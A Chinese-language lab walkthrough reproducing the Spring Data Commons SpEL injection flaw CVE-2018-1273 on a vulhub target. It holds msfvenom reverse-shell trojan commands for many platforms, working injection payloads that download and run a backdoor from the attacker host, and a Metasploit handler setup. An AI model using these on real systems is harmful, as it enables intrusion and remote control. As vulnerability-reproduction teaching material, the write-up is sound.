漏洞说明
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
漏洞影响范围
- Spring Data Commons 1.13至1.13.10(Ingalls SR10)
- Spring Data REST 2.6至2.6.10(Ingalls SR10)
- Spring Data Commons 2.0至2.0.5(Kay SR5)
- Spring Data REST 3.0至3.0.5(Kay SR5)
以上就是CVE-2018-1273的说明,接下来就来准备我们的漏洞复现的实验环境
使用的靶场是vulhub如果没有安装,请看下面的链接进行安装靶场
攻击机:kali -- 192.168.159.134
目标机:ubuntu -- 192.168.159.137
漏洞复现
1.开启我们的靶机环境
- docker-compose build
- docker-compose up -d
一个简单的用户注册功能
2.使用kali配置后门木马
生成windows系统文件格式为EXE的木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe
生成windows系统文件格式为DLL的木马
msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' lhost=192.168.1.20 lport=9999 -f dll > payload.dll
生成32位Linux系统文件格式为EIF的木马
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf
生成64位Linux系统文件格式为EIF的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf
生成Linux系统文件格式为SO的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so
生成32位MAX系统文件格式为MACHO的木马
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho
生成64位MAX系统文件格式为MACHO的木马
msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho
生成Android系统文件格式为APK的木马
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.apk
生成IOS系统文件格式为APK的木马
msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.ios
因为目标机是ubuntu系统,所以我们的需要配置的是linux的后门
这里的lhost改成我们攻击机的IP地址 iport改成我们监听的端口号
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.159.134 lport=4444 -f elf -o payload.elf
可以看到在目录上生成了一个payload.elf的文件这就是我们的木马后门需要上传到靶机上去
3.开启http服务将kali中的8000端口映射出去
python3 -m http.server 8000
现在我们的准备工作都准备好了现在来进行CVE-2018-1273远程代码执行漏洞的复现
漏洞的代码注入格式
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('执行的命令')")]=asdf
4.使用burpsuite进行请求包的拦截进行重发包
wget 192.168.159.134:8000/payload.elf命令为对kali机中的后门进行下载
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('wget 192.168.159.134:8000/payload.elf')")]=asdf
- 命令执行成功了看到了目标机已经下载了攻击机中的后门文件
5.对后门文件进行加权限
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('chmod 777 payload.elf')")]=asdf
6.打开msfconsole进行4444端口监听
use exploit/multi/handler
# 因为目标机是linux所以要用linux的payload
set payload linux/x64/meterpreter/reverse_tcp
# 设置我们攻击机的ip地址
set LHOST 192.168.159.134
# 设置木马设置的反弹端口
set LPORT 4444
7.在目标机中运行后门文件
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('./payload.elf')")]=asdf
然后可以看到目标机的已经连接到我们的攻击机上了,这个漏洞就复现完成了
有CVE-2018-1273远程代码执行的漏洞尽量赶快跟新版本以免造成不可以避免的损失